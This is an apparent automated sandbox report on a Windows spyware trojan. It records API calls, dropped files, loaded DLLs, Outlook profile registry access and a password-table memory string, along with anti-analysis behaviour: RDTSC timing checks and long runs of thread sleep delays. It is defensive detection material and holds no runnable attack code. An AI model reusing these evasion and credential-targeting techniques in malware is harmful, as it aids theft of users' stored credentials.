Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_004034A5
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 3_2_004034A5
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: String function: 00402C41 appears 51 times
            Source: rXKfKM0T49.exe, 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs rXKfKM0T49.exe
            Source: rXKfKM0T49.exe, 00000003.00000000.1811523290.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs rXKfKM0T49.exe
            Source: rXKfKM0T49.exe, 00000003.00000002.2649479506.00000000355E7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rXKfKM0T49.exe
            Source: rXKfKM0T49.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs rXKfKM0T49.exe
            Source: rXKfKM0T49.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeMutant created: NULL
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeFile created: C:\Users\user\AppData\Local\Temp\nsoC014.tmpJump to behavior
            Source: rXKfKM0T49.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rXKfKM0T49.exe, 00000003.00000002.2652046885.000000003678D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rXKfKM0T49.exeVirustotal: Detection: 75%
            Source: rXKfKM0T49.exeReversingLabs: Detection: 78%
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeFile read: C:\Users\user\Desktop\rXKfKM0T49.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rXKfKM0T49.exe "C:\Users\user\Desktop\rXKfKM0T49.exe"
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess created: C:\Users\user\Desktop\rXKfKM0T49.exe "C:\Users\user\Desktop\rXKfKM0T49.exe"
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess created: C:\Users\user\Desktop\rXKfKM0T49.exe "C:\Users\user\Desktop\rXKfKM0T49.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: rXKfKM0T49.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: Yara match | File source: 00000000.00000002.1814401893.0000000003E6F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2624047215.00000000022BF000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_70091B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe | File created: C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Process information set: NOOPENFILEERRORBOX (59 identical events)

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\rXKfKM0T49.exeAPI/Special instruction interceptor: Address: 479A97A
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeAPI/Special instruction interceptor: Address: 2BEA97A
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeRDTSC instruction interceptor: First address: 475E566 second address: 475E566 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FC80CC5D048h 0x00000006 test ebx, edx 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeRDTSC instruction interceptor: First address: 2BAE566 second address: 2BAE566 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FC80CB05D88h 0x00000006 test ebx, edx 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeMemory allocated: 35760000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeMemory allocated: 35410000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597125Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596707Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596534Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596391Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596257Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595359Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595141Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594592Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594484Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594375Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeWindow / User API: threadDelayed 2265Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeWindow / User API: threadDelayed 7582Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeAPI coverage: 3.6 %
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2968Thread sleep count: 2265 > 30Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2968Thread sleep count: 7582 > 30Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597562s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -597453s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -597344s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -597234s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -597125s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -597016s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -596891s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -596707s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -596534s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -596391s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -596257s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -596141s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -596031s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -595922s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -595812s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -595703s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -595594s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -595469s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -595250s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -595141s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -594922s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -594703s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -594592s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -594484s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | TID: 2984 | Thread sleep time: -594375s >= -30000s
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_00402868 FindFirstFileW,0_2_00402868
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_00402868 FindFirstFileW,3_2_00402868
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 599890
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 599672
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 599562
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 599453
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 599344
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 599219
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 599000
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 598891
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 598672
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 598562
